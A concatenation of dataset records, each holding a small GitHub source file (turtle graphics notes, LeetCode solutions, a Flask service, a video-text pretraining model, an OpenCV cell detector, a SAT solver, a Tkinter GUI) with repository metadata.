画笔的绘制速度,取值范围[0,10],其取值范围阶段为:(1,3,6,10,0)分别对应(最慢,慢,正常,快,超快)\nturtle.speed(1)\n\n# 移动相关(画笔的起始位置,默认为(0,0))\n# 向当前画笔方向移动distance像素长度,别名:fd\nturtle.forward(distance=100)\n# 向当前画笔反方向移动distance像素长度,别名:back | bk\n#turtle.backward(distance=200)\n# 顺时针旋转角度,别名:rt\nturtle.right(90)\nturtle.backward(distance=200)\n# 逆时针旋转角度,别名:lt\nturtle.left(90)\nturtle.backward(distance=100)\n# 画笔移动到指定位置,别名:setpos | setposition | goto\nturtle.goto(x=0, y=0)\n# 绘制圆.参数依次为半径,角度,绘制的步数\n# 若半径为正,则圆心在画笔的左边,若为负则在画笔的右边;后两个参数可省略,默认为360度,步数为1\nturtle.circle(radius=-100, extent=180, steps=6)\n\n# 设置图形填充颜色,可使用字符串如\"blue\"或者RGB值比如(255,2,55)\nturtle.fillcolor('red')\n# 设置图形开始填充\nturtle.begin_fill()\n# 设置图形填充完成\nturtle.end_fill()\n\n# 编写文本:\nturtle.write(\"王 江 烟\", move=True, align='left', font=('Arial',30,'normal'))\n# 设置x坐标\nturtle.setx(x=100)\n# 设置y坐标\nturtle.sety(y=100)\n# 设置箭头的朝向,别名: seth\nturtle.setheading(to_angle=90)\n'''\n\n\n\n\nturtle.done()\n","repo_name":"wangxuhe/Python","sub_path":"_turtle/_turtlefunc.py","file_name":"_turtlefunc.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21298736085","text":"from typing import Optional\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n# case 1 : 끝까지 확인해 리스트에 value 넣고 체크하기\nclass Solution:\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n node2list = []\n while head:\n node2list.append(head.val)\n head = head.next\n if node2list == node2list[::-1]:\n return True\n else:\n return False\n\n# case 2 : Reversed first half == Second half?\n\n\"\"\"\nPhase 1: Reverse the first half while finding the middle.\nPhase 2: Compare the reversed first half with the second half.\n*link: https://leetcode.com/explore/interview/card/top-interview-questions-easy/93/linked-list/772/discuss/64500/11-lines-12-with-restore-O(n)-time-O(1)-space\n\"\"\"\nclass Solution:\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n rev = None\n slow = fast = head\n while fast and fast.next:\n fast = fast.next.next\n rev, rev.next, slow = slow, rev, slow.next\n if fast:\n slow = slow.next\n while rev and rev.val == slow.val:\n slow = slow.next\n rev = rev.next\n return not rev\n","repo_name":"jarammm/TIL","sub_path":"Algorithm/LinkedList/Palindrome Linked List.py","file_name":"Palindrome Linked List.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40732372089","text":"import csv\nfrom typing import Dict\n\n\nclass CSVCustom:\n\n def __init__(self, file_path: str, fieldnames: list = None):\n self.file_path = file_path\n self.file = None\n self.fieldnames = fieldnames\n\n def __enter__(self):\n try:\n self.file = csv.DictReader(open(self.file_path))\n except FileNotFoundError:\n self.file = csv.DictWriter(open(self.file_path, 'w'), fieldnames=self.fieldnames)\n self.file.writeheader()\n finally:\n if not self.file:\n raise\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n pass\n\n def read_row(self) -> Dict[str, str]:\n if isinstance(self.file, csv.DictWriter):\n raise RuntimeError('Can read while file is open as write mode.')\n yield from self.file\n\n def write_row(self, row: Dict[str, str]):\n if isinstance(self.file, csv.DictReader):\n raise RuntimeError('Can write while file is open as read mode.')\n self.file.writerow(row)\n","repo_name":"senavs/GooApple","sub_path":"utils/context_csv.py","file_name":"context_csv.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"7391215442","text":"\"\"\"Does url processing.\"\"\"\n# pylint: disable=W0312\nimport os\nfrom flask import Flask\nfrom flask import request\nfrom identifyurl import Identify\n\n# check if logger is enabled\nLOG_ENABLE = os.environ[\"DEPLOYED\"] if \"DEPLOYED\" in os.environ else ''\n\nif LOG_ENABLE == \"1\":\n from logger import Logger\n LOG = Logger(os.getenv('LOGGER_ADDR'))\n\n\napp = Flask(__name__)\n@app.route('/extract_page', methods=['POST'])\ndef processurl():\n\t\"\"\"Processes the url as html or pdf.Arg: data => input json object with url.\"\"\"\n\tdata = request.get_json(force=True)\n\t# print(data)\n\turl = data['url']\n\t# pdf has the routes to pdf parser\n\tpdf = {'pdf_upload' : data['pdf_upload'], 'pdf_parser' : data['pdf_parser']}\n\t# print('hello')\n\tif LOG_ENABLE == \"1\":\n\t\tLOG.info('url_processing', 'POST', 'NULL', 'NULL', 'URL processed successfully')\n\tresult = Identify(url, pdf).classify_url()\n\treturn result\n\n@app.route('/')\ndef hello():\n\t\"\"\"Hello world.\"\"\"\n\treturn \"hello world from url_processing\"\n\nif __name__ == '__main__':\n\tapp.run('0.0.0.0', debug=True, port=80)\n","repo_name":"sravani-kaza/BTP_1","sub_path":"url_processing/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20259255462","text":"from locale import LC_NUMERIC\nfrom src.models.bert import (\n BertConfig, BertModel, BertOnlyMLMHead, BertOnlyNSPHead, BertForMaskedLM)\nfrom src.models.video_encoder import SwinTransformer3D\nfrom src.models.text_encoder import TextEncoderForPretraining\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nimport numpy as np\nimport random\nimport einops\nfrom src.utils.logger import LOGGER\nfrom src.utils.dist import SyncFunction\nfrom src.utils.misc import vector_gather\nfrom timm.models.vision_transformer import Block\n\n\nclass VideoTokenPos(nn.Module):\n def __init__(self,num_patches=6, num_frames=32, hidden_size=768):\n super().__init__()\n self.s_pos_embed = nn.Parameter(0.02*torch.randn(1, 1, num_patches, hidden_size), requires_grad=True)\n self.t_pos_embed = nn.Parameter(0.02*torch.randn(1, num_frames, 1, hidden_size), requires_grad=True)\n self.norm = nn.LayerNorm(hidden_size)\n\n def forward(self, video_embd):\n video_embd = video_embd + self.s_pos_embed + self.t_pos_embed\n video_embd = self.norm(video_embd)\n return video_embd\n\nclass SentEmbedding(nn.Module):\n def __init__(self, cfg):\n super().__init__()\n self.embed_dim = cfg.hidden_size\n self.position_embeddings = nn.Embedding(cfg.max_position_embeddings, cfg.hidden_size)\n self.segment_embeddings = nn.Embedding(cfg.type_vocab_size, cfg.hidden_size)\n self.norm = nn.LayerNorm(cfg.hidden_size, eps=cfg.layer_norm_eps)\n self.dropout = nn.Dropout(cfg.hidden_dropout_prob)\n self.register_buffer(\"position_ids\", torch.arange(cfg.max_position_embeddings).expand((1, -1)))\n\n def forward(self, inputs_embeds, token_type_ids):\n segment_embeddings = self.segment_embeddings(token_type_ids) # B, N, C\n seq_length = inputs_embeds.shape[1]\n position_ids = self.position_ids[:, :seq_length]\n position_embeddings = self.position_embeddings(position_ids)\n embeddings = inputs_embeds + position_embeddings + segment_embeddings\n embeddings = self.norm(embeddings)\n embeddings = self.dropout(embeddings)\n return embeddings\n\n\nclass LFVILA_Pretrain(nn.Module):\n def __init__(self, args, config):\n super().__init__()\n self.cfg = config\n self.args = args\n self.video_encoder = SwinTransformer3D(**config.VideoEncoder)\n bert_config = BertConfig.from_json_file(config.bert_config)\n setattr(bert_config,'stage',config.stage)\n setattr(bert_config,'num_local_layers',config.num_local_layers)\n setattr(bert_config,'stage1_layers',config.stage1_layers)\n setattr(bert_config,'bert_frozen_stage',config.bert_frozen_stage)\n self.text_encoder = TextEncoderForPretraining(args, config=bert_config)\n self.video_downsample = nn.MaxPool2d((2,3), stride=(1,1))\n\n self.video_local_proj = nn.Linear(bert_config.hidden_size, bert_config.hidden_size)\n self.text_local_proj = nn.Linear(bert_config.hidden_size, bert_config.hidden_size)\n\n self.video_global_proj = nn.Linear(bert_config.hidden_size, bert_config.hidden_size)\n self.text_global_proj = nn.Linear(bert_config.hidden_size, bert_config.hidden_size)\n\n if config.stage == 2:\n self._freeze_stage_one_params()\n self.video_token_pos = VideoTokenPos(num_patches=config.final_num_patches,\n num_frames=config.DATA.sample_frame,\n hidden_size=bert_config.hidden_size)\n\n setattr(bert_config,'type_vocab_size',config.type_vocab_size)\n self.sent_embedding = SentEmbedding(bert_config)\n\n def _init_sent_embedding(self):\n self.sent_embedding.position_embeddings.weight.data.copy_(self.text_encoder.bert.embeddings.position_embeddings.weight.data)\n\n def _freeze_stage_one_params(self):\n freeze_modules = [\"video_encoder\", \"video_local_proj\", \"text_local_proj\", \"video_global_proj\", \"text_global_proj\", \"sent_embedding\"]\n for i in freeze_modules:\n m = getattr(self, i)\n m.eval()\n for param in m.parameters():\n param.requires_grad = False\n\n for m in [self.text_encoder.bert.embeddings]:\n m.eval()\n for param in m.parameters():\n param.requires_grad = False\n\n for i in range(0, 12):\n m = self.text_encoder.bert.encoder.layer[i]\n m.eval()\n for param in m.parameters():\n param.requires_grad = False\n\n def ct_global_loss(self, video_feat, text_feat):\n temp = self.cfg.TRAINING.temp\n t2v = torch.matmul(video_feat, text_feat.permute(1, 0)) / temp # temperature\n v2t = t2v.permute(1, 0)\n t2v_label = torch.arange(t2v.shape[0], device=t2v.device)\n v2t_label = t2v_label\n loss = (F.cross_entropy(t2v, t2v_label) + F.cross_entropy(v2t, v2t_label)).mean()\n return loss\n\n def ct_time_loss(self, video_local_feat,text_local_feat):\n b,m,c = video_local_feat.shape\n temp = self.cfg.TRAINING.time_temp\n num_key = self.cfg.TRAINING.num_key\n num_value = self.cfg.TRAINING.num_value\n num_other_neg=self.cfg.TRAINING.num_other_neg\n \n key_indices = torch.cat([torch.randperm(m).unsqueeze(0) for x in range(b)],dim=0)[:,:num_key].to(text_local_feat.device)\n value_indices = torch.cat([torch.randperm(m).unsqueeze(0) for x in range(b)],dim=0)[:,:num_value].to(text_local_feat.device)\n text_key_feat = vector_gather(text_local_feat, key_indices) \n video_value_feat = vector_gather(video_local_feat, value_indices)\n\n if num_other_neg > 0:\n other_neg_indices = torch.cat([torch.randperm(m).unsqueeze(0) for x in range(b)],dim=0)[:,0].to(text_local_feat.device)\n video_other_neg = vector_gather(video_local_feat, other_neg_indices)\n video_other_neg = torch.cat([video_other_neg.roll(shifts=x, dims=0).unsqueeze(1) for x in range(num_other_neg)],dim=1)\n video_value_feat = torch.cat([video_value_feat, video_other_neg],dim=1)\n\n sim_t2v = torch.matmul(text_key_feat, video_value_feat.permute(0,2,1)).flatten(0,1) / temp\n\n t2v_label = ((value_indices.unsqueeze(1) - key_indices.unsqueeze(2))).abs().argmin(dim=-1).flatten(0,1)\n\n minus = ((value_indices.unsqueeze(1) - key_indices.unsqueeze(2))).abs()\n mask = ((minus[:,:,0] - minus[:,:,-1]) == 0 ).flatten(0,1)\n t2v_label = t2v_label.masked_fill_(mask, -100)\n \n video_key_feat = vector_gather(video_local_feat, key_indices) \n text_value_feat = vector_gather(text_local_feat, value_indices)\n\n if num_other_neg > 0:\n text_other_neg = vector_gather(text_local_feat, other_neg_indices)\n text_other_neg = torch.cat([text_other_neg.roll(shifts=x, dims=0).unsqueeze(1) for x in range(num_other_neg)],dim=1)\n text_value_feat = torch.cat([text_value_feat, text_other_neg],dim=1)\n\n sim_v2t = torch.matmul(video_key_feat, text_value_feat.permute(0,2,1)).flatten(0,1) / temp\n\n v2t_label = t2v_label\n\n loss = (F.cross_entropy(sim_t2v, t2v_label) + F.cross_entropy(sim_v2t, v2t_label)).mean()\n \n return loss\n\n\n def downsample_video_embd(self, video_embd):\n sample_clip = self.cfg.DATA.sample_clip\n B, N, H, W, C = video_embd.size() # B, N, H, W, C\n video_embd = video_embd.permute(0,1,4,2,3)\n video_embd = self.video_downsample(video_embd.view(B*N, C, H, W))\n video_embd = video_embd.permute(0,2,3,1) # B*N, H, W, C\n video_embd = video_embd.view(B, N, video_embd.size(-3), video_embd.size(-2),video_embd.size(-1))\n video_embd = video_embd.flatten(2,3) # B, N, X, C\n\n video_feat = video_embd.view(B, sample_clip, int(N/sample_clip), -1, C)\n video_feat = video_feat.mean(dim=[2,3])\n\n return video_feat, video_embd\n\n def shuffle_embd_for_vtm(self, video_embd):\n B, L, C = video_embd.shape\n video_embd_neg = torch.roll(video_embd[:(B//2)],1,0)\n video_embd = torch.cat([video_embd_neg, video_embd[(B//2):]], dim=0)\n vtm_label = torch.cat([torch.zeros((B//2),device=video_embd.device,dtype=torch.long), torch.ones((B-B//2),device=video_embd.device,dtype=torch.long)])\n return video_embd, vtm_label\n\n\n def forward(self, video_frames, text_ids, \n attention_mask, mlm_labels = None, \n stage=2,is_train=True,is_pretrain_val=False):\n\n # extract video feature\n B, C, N, H, W = video_frames.size()\n video_global_embd, video_local_embd = self.video_encoder(video_frames) # B, N, H, W, C\n\n video_local_feat1, _ = self.downsample_video_embd(video_local_embd)\n video_local_feat2, video_stage1_embd = self.downsample_video_embd(video_global_embd)\n\n # extract text feature\n B,M,L = text_ids.shape\n text_local_embd = self.text_encoder(text_ids.view(B*M, L), attention_mask=attention_mask.view(B*M, L), return_dict=True, stage=0).view(B, M, L, -1) # B, M, L, C\n\n if stage == 1:\n\n text_local_feat = text_local_embd[:,:,0,:] # B, M, C\n video_local_feat = F.normalize(self.video_local_proj(video_local_feat1),dim=-1)\n text_local_feat = F.normalize(self.text_local_proj(text_local_feat),dim=-1)\n else:\n video_local_feat, text_local_feat = None, None\n\n B,M,L,C = text_local_embd.shape\n\n text_segment_id = torch.arange(M, device=text_local_embd.device).repeat(B,1).repeat_interleave(L,dim=1)# B, N\n text_local_embd = self.sent_embedding(text_local_embd.view(B,M*L,-1), text_segment_id)\n\n text_local_cls = text_local_embd.view(B,M,L,-1)[:,:,0,:].mean(dim=1) # B,C\n text_global_embd = torch.cat([text_local_cls.unsqueeze(1),text_local_embd], dim=-2) # b, 1+M*L, c\n attention_mask = torch.cat([torch.tensor([1.],dtype=attention_mask.dtype, device=attention_mask.device).repeat(B,1),attention_mask.view(B,M*L)], dim=-1) # b, 1+M*L\n text_global_embd = self.text_encoder(text_global_embd, attention_mask=attention_mask, return_dict=True, stage=1) # B, 1+M*L, C\n \n if stage == 1:\n text_global_feat = text_global_embd[:,0,:] # B, C\n video_global_feat = video_local_feat2.mean(dim=1)\n\n video_global_feat = F.normalize(self.video_global_proj(video_global_feat),dim=-1)\n text_global_feat = F.normalize(self.text_global_proj(text_global_feat),dim=-1)\n\n else:\n text_global_feat, video_global_feat = None, None\n\n if stage == 1:\n if self.args.distributed:\n text_global_feat = SyncFunction.apply(text_global_feat)\n video_global_feat = SyncFunction.apply(video_global_feat)\n\n if self.cfg.TRAINING.use_time_match:\n text_local_feat = SyncFunction.apply(text_local_feat)\n video_local_feat = SyncFunction.apply(video_local_feat) \n\n ct_global_loss, ct_time_loss = 0, 0\n if is_train or is_pretrain_val:\n if stage == 1:\n ct_global_loss = self.ct_global_loss(video_global_feat, text_global_feat)\n weight=self.cfg.TRAINING.ct_global_loss_weight\n ct_global_loss = weight*ct_global_loss\n\n if self.cfg.TRAINING.use_time_match:\n ct_time_loss = self.ct_time_loss(text_local_feat,video_local_feat)\n weight=self.cfg.TRAINING.ct_time_loss_weight\n ct_time_loss = weight*ct_time_loss\n\n if stage == 1:\n \n return dict(text_global_feat = text_global_feat,\n video_global_feat = video_global_feat,\n ct_global_loss = ct_global_loss,\n ct_time_loss = ct_time_loss,\n mlm_loss=0,\n vtm_loss=0,\n mlm_prediction=0,\n mlm_acc = 0,\n vtm_acc = 0\n )\n\n video_stage1_embd = self.video_token_pos(video_stage1_embd)\n\n video_stage1_embd = video_stage1_embd.flatten(1,2)\n\n visual_attention_mask = attention_mask.new_ones(\n video_stage1_embd.shape[:2])\n attention_mask = torch.cat(\n [attention_mask, visual_attention_mask], dim=-1)\n\n\n video_stage1_embd, vtm_labels = self.shuffle_embd_for_vtm(video_stage1_embd)\n\n stage1_embedding_output = torch.cat([text_global_embd, video_stage1_embd], dim=1)\n\n mlm_labels = torch.cat([-100*mlm_labels.new_ones(mlm_labels.shape[:1]).unsqueeze(1), mlm_labels, -100*mlm_labels.new_ones(video_stage1_embd.shape[:2])], dim=1)\n\n fusion_output = self.text_encoder(stage1_embedding_output, attention_mask=attention_mask, mlm_labels = mlm_labels, vtm_labels=vtm_labels, return_dict=True, stage=2)\n\n\n mlm_loss = self.cfg.TRAINING.mlm_loss_weight * fusion_output['mlm_loss']\n mlm_acc = fusion_output['mlm_acc']\n mlm_prediction = fusion_output['mlm_logits']\n vtm_acc = fusion_output['vtm_acc']\n vtm_loss = self.cfg.TRAINING.vtm_loss_weight * fusion_output['vtm_loss']\n\n return dict(mlm_loss=mlm_loss,\n vtm_loss=vtm_loss,\n mlm_prediction=mlm_prediction,\n mlm_acc = mlm_acc,\n vtm_acc = vtm_acc,\n ct_global_loss = 0.,\n ct_time_loss = 0.,\n )\n \n\n","repo_name":"microsoft/XPretrain","sub_path":"LF-VILA/src/models/lfvila_pretrain.py","file_name":"lfvila_pretrain.py","file_ext":"py","file_size_in_byte":13580,"program_lang":"python","lang":"en","doc_type":"code","stars":369,"dataset":"github-code","pt":"77"} +{"seq_id":"16611583177","text":"import os\nimport shutil\n\n\nif __name__ == \"__main__\":\n processed_path = \"./DL_test\"\n base_path = \"./DL_data\"\n val_txt_path = base_path + \"/val.txt\"\n\n with open(val_txt_path) as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n img_name, label = line.split(\" \")\n\n label = label.replace(\"\\n\",\"\")\n\n img_dir_path = processed_path + \"/\" + label\n img_src_path = base_path + \"/test_images/\" + img_name\n img_dst_path = img_dir_path + \"/\" + img_name\n if not os.path.isdir(img_dir_path):\n os.mkdir(img_dir_path)\n\n shutil.copyfile(img_src_path, img_dst_path)\n\n\n\n","repo_name":"divanoLetto/Explicability-of-decisions-and-uncertainty-in-Deep-Learning","sub_path":"dataset/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43703568551","text":"# Detects cells in the specified frames.\n# Standard imports\nimport cv2\nimport numpy as np\nimport scipy\nimport scipy.ndimage.measurements as measurements\nimport sys\nimport os\nimport getopt\nfrom video_capture_function import *\nfrom detector_function import *\nfrom background_remover_function import *\nfrom track_cells import *\nimport pandas as pd\n\ndef usage():\n script = os.path.basename(__file__)\n print(\"\\n\\nUsage: \" + script + \" [options] \")\n print('''\n Options:\n -h --help (help)\n -w --minboxweight (bounding boxes below minboxweight * (averagebox size) area deleted)\n\n -n --windowsize (resolution of background removal in terms of pixel size)\n -b --blocksize (region at which local threshold is calculated)\n -c --subtractedconstant (constant value subtracted from threshold value in gaussian adaptive threshold)\n -r --backgroundrelative (default 0, signifying a dark background. If background is lighter than cells, input 1)\n\n -t --tuningmode (if tuning background remover, input 'True')\n\n (e.g. ~/input.avi)\n (e.g. ~/output.mp4)\n ''')\n sys.exit()\n\ndef main():\n\n opts, files = getopt.getopt(sys.argv[1:], \"h:w:n:b:c:r:t:\", [ \"help\", \"minboxweight\",\"windowsize\", \"blocksize\", \"subtractedconstant\", \"backgroundrelative\", \"tuningmode\"])\n\n if len(files) != 2:\n usage()\n\n # defaults:\n parameters = {}\n parameters['w'] = 0.3\n parameters['n'] = 1\n parameters['b'] = 1001\n parameters['c'] = 0\n parameters['r'] = 0\n parameters['t'] = False\n\n # loop over options:\n for option, argument in opts:\n if option in (\"-h\", \"--help\"):\n usage()\n elif option in (\"-w\", \"--minboxweight\"):\n parameters['w'] = argument\n if np.float(parameters['w']) <= 0:\n usage()\n elif option in (\"-n\", \"--windowsize\"):\n parameters['n'] = argument\n elif option in (\"-b\", \"--blocksize\"):\n parameters['b'] = argument\n elif option in (\"-c\", \"--subtractedconstant\"):\n parameters['c'] = argument\n elif option in (\"-r\", \"--backgroundrelative\"):\n parameters['r'] = argument\n elif option in (\"-t\", \"--tuningmode\"):\n parameters['t'] = argument\n\n # split path\n base = os.path.basename(files[0])\n input_picture_name, input_picture_extension = os.path.splitext(base)\n output_path = files[1]\n output_picture_directory, output_picture_extension = os.path.splitext(files[1])\n\n # parameters\n min_box_weight = np.float(parameters['w'])\n n = np.int(parameters['n'])\n b = np.int(parameters['b'])\n c = np.float(parameters['c'])\n background_relative = np.int(parameters['r'])\n tuning_mode = False\n if parameters['t'] in ['True', 'true']:\n tuning_mode = True\n\n # write images into a folder\n print('converting video to images...')\n im_list = store_images(files[0], output_picture_directory)\n im_list = im_list[:int(len(im_list)/45)]\n\n # remove background\n # input_folder = os.path.dirname(output_picture_directory)\n print('removing background...')\n mask_list = remove_background_a2a(n, b, c, background_relative, im_list)\n if tuning_mode:\n write_video(mask_list, files[1])\n sys.exit()\n return\n\n # run detection on first frame\n print('detecting cells...')\n total_boxes = detect_frames(min_box_weight, output_picture_directory, images_array = mask_list, num_frames = len(im_list))\n # draw boxes on gray scale\n for frame_index, frame in enumerate(im_list):\n f = total_boxes['frame ' + str(frame_index)]\n boxes = []\n for box in f:\n box = (f[box]['x'], f[box]['y'], f[box]['width'], f[box]['height'])\n boxes.append(box)\n\n # draw\n for index, new_box in enumerate(boxes):\n # access box elements and draw\n p1 = (int(new_box[0]), int(new_box[1])) # point 1 of new box\n p2 = (int(new_box[0] + new_box[2]), int(new_box[1] + new_box[3])) # point 2 of box\n cv2.rectangle(frame, p1, p2, (255,255,255), 2, 1)\n cv2.putText(frame, str(index), (p1[0],p1[1]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.3, (255,255,255), 1)\n\n # write the current frame of the video\n if output_path is not None:\n cv2.imwrite(output_picture_directory + 'frame_' + str(frame_index) + '.png', frame)\n\n # write bounding box frame information\n with open(output_picture_directory + '_fframe.txt', 'w') as f:\n f.write(\"%s\\n\" % bboxes)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wongrp/chemotaxis_tracker_opencv","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29447424015","text":"# Description\n# Given a string S with only lowercase characters.\n\n# Return the number of substrings that contains at least k distinct characters.\n\n# 10 ≤ length(S) ≤ 1,000,00010≤length(S)≤1,000,000\n# 1 ≤ k ≤ 261≤k≤26\n# Example\n# Example 1:\n\n# Input: S = \"abcabcabca\", k = 4\n# Output: 0\n# Explanation: There are only three distinct characters in the string.\n# Example 2:\n\n# Input: S = \"abcabcabcabc\", k = 3\n# Output: 55\n# Explanation: Any substring whose length is not smaller than 3 contains a, b, c.\n# For example, there are 10 substrings whose length are 3, \"abc\", \"bca\", \"cab\" ... \"abc\"\n# There are 9 substrings whose length are 4, \"abca\", \"bcab\", \"cabc\" ... \"cabc\"\n# ...\n# There is 1 substring whose length is 12, \"abcabcabcabc\"\n# So the answer is 1 + 2 + ... + 10 = 55.\n\nclass Solution:\n \"\"\"\n @param s: a string\n @param k: an integer\n @return: the number of substrings there are that contain at least k distinct characters\n \"\"\"\n def k_distinct_characters(self, s: str, k: int) -> int:\n char_count = {}\n fast = 0\n total = 0\n\n for slow in range(len(s)):\n while len(char_count) < k and fast < len(s):\n curr_char = s[fast]\n char_count[curr_char] = char_count.get(curr_char, 0) + 1\n fast += 1\n\n if len(char_count) == k:\n total += (len(s) - 1) - (fast - 1) + 1\n\n char_count[s[slow]] -= 1\n if char_count[s[slow]] == 0:\n del char_count[s[slow]]\n\n return total\n\n","repo_name":"jerry-jma/Data-Structure-and-Algorithm-Python3","sub_path":"Two_Pointers/Substring With At Least K Distinct Characters.py","file_name":"Substring With At Least K Distinct Characters.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11664538793","text":"import pip\n\n\ndef install_packages(package):\n pip.main(['install', package])\n\n\ntry:\n import itertools\nexcept ImportError:\n print('itertools is not installed, installing it now!')\n install_packages('itertools')\n\n\nclass BruteForce:\n\n sat = False\n satDict = None\n\n def __init__(self, clauses):\n self.clauses = clauses\n\n def getLiterals(self):\n return set([abs(y) for x in self.clauses for y in x])\n\n def solve(self):\n literals = BruteForce.getLiterals(self)\n n = len(literals)\n\n for seq in itertools.product([True, False], repeat=n):\n res = set([lit if boo else -lit for boo, lit in zip(seq, literals)])\n if all([bool(set(x).intersection(res)) for x in self.clauses]):\n self.sat, self.satDict = True, dict(zip(literals, seq))\n","repo_name":"JoseMAP-99/MultiSAT","sub_path":"Algos/BruteForce.py","file_name":"BruteForce.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9601400144","text":"#GUI lib\r\nimport tkinter as tk\r\nfrom tkinter import *\r\nimport kelas\r\n\r\nclass i_jrs:\r\n def f_p():\r\n f_p = tk.Tk()\r\n f_p.title(\"FR SYSTEM\")\r\n f_p.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_p = LabelFrame(f_p, text=\"Fakultas Psikologi\")\r\n wrapper_f_p.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gp = tk.Label(wrapper_f_p, text=\"DAFTAR JURUSAN\")\r\n lbl_gp.place(x=100, y=10)\r\n # create btn\r\n def f_psi():\r\n kelas.kls_fp.psik()\r\n btn_p = tk.Button(wrapper_f_p, text=\"PSIKOLOGI\", width=25, height=2, command=f_psi)\r\n btn_p.place(x=60, y=50)\r\n f_p.mainloop()\r\n\r\n def f_s():\r\n f_s = tk.Tk()\r\n f_s.title(\"FR SYSTEM\")\r\n f_s.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_s = LabelFrame(f_s, text=\"Fakultas Sastra\")\r\n wrapper_f_s.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gs= tk.Label(wrapper_f_s, text=\"DAFTAR JURUSAN\")\r\n lbl_gs.place(x=100, y=10)\r\n # create btn\r\n def sast():\r\n kelas.kls_fs.sastra()\r\n btn_sasi = tk.Button(wrapper_f_s, text=\"SASTRA INGGRIS\", width=25, height=2, command=sast)\r\n btn_sasi.place(x=60, y=50)\r\n f_s.mainloop()\r\n\r\n def f_ikti():\r\n f_ikti = tk.Tk()\r\n f_ikti.title(\"FR SYSTEM\")\r\n f_ikti.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_ikti = LabelFrame(f_ikti, text=\"Fakultas Ilmu Komputer dan Teknologi Informasi\")\r\n wrapper_f_ikti.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gikti = tk.Label(wrapper_f_ikti, text=\"DAFTAR JURUSAN\")\r\n lbl_gikti.place(x=100, y=10)\r\n # create btn\r\n def siin():\r\n kelas.kls_fikti.si()\r\n btn_si = tk.Button(wrapper_f_ikti, text=\"SISTEM INFORMASI\", width=25, height=2, command=siin)\r\n btn_si.place(x=60, y=50)\r\n\r\n def siko():\r\n kelas.kls_fikti.sk()\r\n btn_ik = tk.Button(wrapper_f_ikti, text=\"SISTEM KOMPUTER\", width=25, height=2, command=siko)\r\n btn_ik.place(x=60, y=100)\r\n f_ikti.mainloop()\r\n\r\n def f_ti():\r\n f_ti = tk.Tk()\r\n f_ti.title(\"FR SYSTEM\")\r\n f_ti.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_ti = LabelFrame(f_ti, text=\"Fakultas Teknologi Industri\")\r\n wrapper_f_ti.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gfti = tk.Label(wrapper_f_ti,text=\"DAFTAR JURUSAN\")\r\n lbl_gfti.place(x=100,y=10)\r\n # create btn\r\n def industri():\r\n kelas.kls_fti.indus()\r\n btn_fp = tk.Button(wrapper_f_ti,text=\"TEKNIK INDUSTRI\", width=25, height=2, command=industri)\r\n btn_fp.place(x=60, y=50)\r\n def informatika():\r\n kelas.kls_fti.kls_inf()\r\n btn_fs = tk.Button(wrapper_f_ti,text=\"TEKNIK INFORMATIKA\", width=25, height=2, command=informatika)\r\n btn_fs.place(x=60, y=100)\r\n def mesin():\r\n kelas.kls_fti.tekmes()\r\n btn_tm = tk.Button(wrapper_f_ti,text=\"TEKNIK MESIN\", width=25, height=2, command=mesin)\r\n btn_tm.place(x=60, y=150)\r\n def elektro():\r\n kelas.kls_fti.tekel()\r\n btn_te = tk.Button(wrapper_f_ti,text=\"TEKNIK ELEKTRO\", width=25, height=2, command=elektro)\r\n btn_te.place(x=60, y=200)\r\n f_ti.mainloop()\r\n\r\n def f_e():\r\n f_e = tk.Tk()\r\n f_e.title(\"FR SYSTEM\")\r\n f_e.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_e = LabelFrame(f_e, text=\"Fakultas Ekonomi\")\r\n wrapper_f_e.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gfe = tk.Label(wrapper_f_e, text=\"DAFTAR JURUSAN\")\r\n lbl_gfe.place(x=100, y=10)\r\n # create btn\r\n def manajemen():\r\n kelas.kls_fe.manaj()\r\n btn_man = tk.Button(wrapper_f_e, text=\"MANAJEMEN\", width=25, height=2, command=manajemen)\r\n btn_man.place(x=60, y=50)\r\n def akuntansi():\r\n kelas.kls_fe.akun()\r\n btn_akn = tk.Button(wrapper_f_e, text=\"AKUNTANSI\", width=25, height=2, command=akuntansi)\r\n 